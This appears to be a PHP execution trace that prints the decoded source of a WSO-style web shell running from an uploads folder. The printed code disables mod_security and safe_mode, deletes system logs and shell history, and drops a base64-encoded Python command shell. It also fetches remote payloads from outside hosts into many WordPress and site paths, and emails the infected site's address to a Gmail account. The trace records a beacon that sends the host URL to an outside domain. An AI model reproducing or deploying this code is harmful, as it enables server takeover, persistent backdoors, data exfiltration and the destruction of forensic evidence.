elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." |<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf /var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya aç\r\nı\r\nlamadı\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . "/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . "/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . "/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n' /var/www/html/uploads/wso.php(4) : eval()'d code 1 0
4 13 0 0.007940 1143752 base64_decode 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 16 1 'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4 13 1 0.007962 1143840
4 13 R 'http://byr00t.co/l-'
4 14 0 0.007980 1143808 GetIP 1 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 16 0
5 15 0 0.007994 1143808 getenv 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 3 1 'HTTP_CLIENT_IP'
5 15 1 0.008013 1143840
5 15 R FALSE
5 16 0 0.008028 1143808 getenv 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 5 1 'HTTP_X_FORWARDED_FOR'
5 16 1 0.008044 1143840
5 16 R FALSE
5 17 0 0.008058 1143808 getenv 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 12 1 'REMOTE_ADDR'
5 17 1 0.008073 1143880
5 17 R '127.0.0.1'
4 A /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 12 $ip = '127.0.0.1'
4 14 1 0.008101 1143848
4 14 R '127.0.0.1'
4 18 0 0.008116 1143872 base64_encode 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 16 1 'http://localhost/uploads/wso.php'
4 18 1 0.008131 1143984
4 18 R 'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzby5waHA='
3 A /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 16 $x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzby5waHA='
4 19 0 0.008165 1143864 function_exists 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 17 1 'curl_init'
4 19 1 0.008179 1143904
4 19 R TRUE
4 20 0 0.008193 1143864 curl_init 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 19 0
4 20 1 0.008215 1144776
4 20 R resource(3) of type (curl)
3 A /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 19 $ch = resource(3) of type (curl)
4 21 0 0.008244 1144776 curl_setopt 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 19 3 resource(3) of type (curl) 10002 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzby5waHA='
4 21 1 0.008265 1144872
4 21 R TRUE
4 22 0 0.008278 1144776 curl_setopt 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 19 3 resource(3) of type (curl) 19913 TRUE
4 22 1 0.008294 1144872
4 22 R TRUE
4 23 0 0.008307 1144776 curl_exec 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 19 1 resource(3) of type (curl)
4 23 1 0.055260 1144808
4 23 R ''
3 A /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 19 $gitt = ''
4 24 0 0.055321 1144776 curl_close 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 19 1 resource(3) of type (curl)
4 24 1 0.055390 1143920
4 24 R NULL
4 25 0 0.055408 1143888 file_get_contents 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 21 1 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzby5waHA='
4 25 1 0.662387 1147584
4 25 R ''
3 A /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 21 $gitt = ''
3 A /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 26 $auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3 A /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 27 $color = '#00ff66'
